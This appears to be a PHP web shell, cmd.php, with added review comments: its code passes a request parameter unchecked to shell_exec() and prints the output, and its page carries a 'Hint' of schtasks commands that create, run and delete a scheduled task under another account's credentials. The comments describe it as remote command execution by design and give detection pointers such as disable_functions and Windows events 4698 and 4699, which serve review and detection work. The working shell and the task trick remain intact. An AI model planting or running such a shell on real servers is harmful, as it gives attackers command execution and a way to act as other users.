<?php
// cmd.php
// BIG5 -- presumably the encoding this file is saved in; the page below declares charset=big5.
//
// Purpose: renders a form with one text field, passes whatever arrives in the
// 'cmd' request parameter to shell_exec(), and prints the command's output.
//
// SECURITY NOTE(review): this is remote command execution by design. Nothing in
// this file authenticates the caller, restricts the source address, checks a
// CSRF token, or limits which commands may run, so anyone who can reach the URL
// can run commands with the privileges of the PHP / web-server account. It
// should not exist under a web-reachable path; finding it on a server is a
// reason to investigate how it got there.
//
// Review and detection pointers:
//  - Code pattern: a request parameter flowing unmodified into shell_exec().
//  - php.ini's disable_functions directive can list shell_exec so calls to it fail.
//  - Access logs: requests to this path. POST bodies are normally not logged,
//    so the command text itself may be missing from the log.
//  - Host telemetry: the web server or PHP worker starting a command shell as a
//    child process.
//  - The "Hint" text in the page body creates, runs and deletes a scheduled task
//    under another account's credentials. On Windows, task creation and deletion
//    are recorded as Security events 4698 and 4699 when the relevant audit
//    policy is enabled.

// Runs only when a 'cmd' parameter is present. $_REQUEST is filled from the
// query string and the POST body (and cookies, depending on request_order), so
// this handler accepts GET even though the form below submits with POST.
if(isset($_REQUEST['cmd'])){
// Strip the backslashes added by magic quotes, if that feature is active.
// get_magic_quotes_gpc() was deprecated in PHP 7.4 and removed in PHP 8.0.
$cmd=get_magic_quotes_gpc()?stripslashes($_REQUEST['cmd']):$_REQUEST['cmd'];
// Hands the raw string to the system shell; no validation or escaping is applied.
$result=shell_exec($cmd);
}
// When 'cmd' is absent, $cmd and $result are never assigned, yet both are read
// in the template below.
?>
<!DOCTYPE html>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=big5" />
<title></title>
</head>
<body>
<b>Command:</b>
<dir>
<form action="" method="post">
<input name="cmd" type="text" value="<?php /* HTML-escaped for the attribute; $cmd is undefined if no 'cmd' was sent */ echo htmlspecialchars($cmd, ENT_QUOTES); ?>" />
<input type="submit" value="Enter" />
</form>
</dir>
<b>Result:</b>
<dir>
<pre><?php /* command output, HTML-escaped; $result is undefined if no 'cmd' was sent */ echo htmlspecialchars($result, ENT_QUOTES); ?></pre>
</dir>
<b>Hint:</b>
<dir>
schtasks /Create /RU "XP帳號" /RP "XP密碼" /SC ONSTART /TR "calc" /TN "temp"<br />
schtasks /Run /TN "temp"<br />
schtasks /Delete /TN "temp" /F<br />
</dir>
</body>
</html>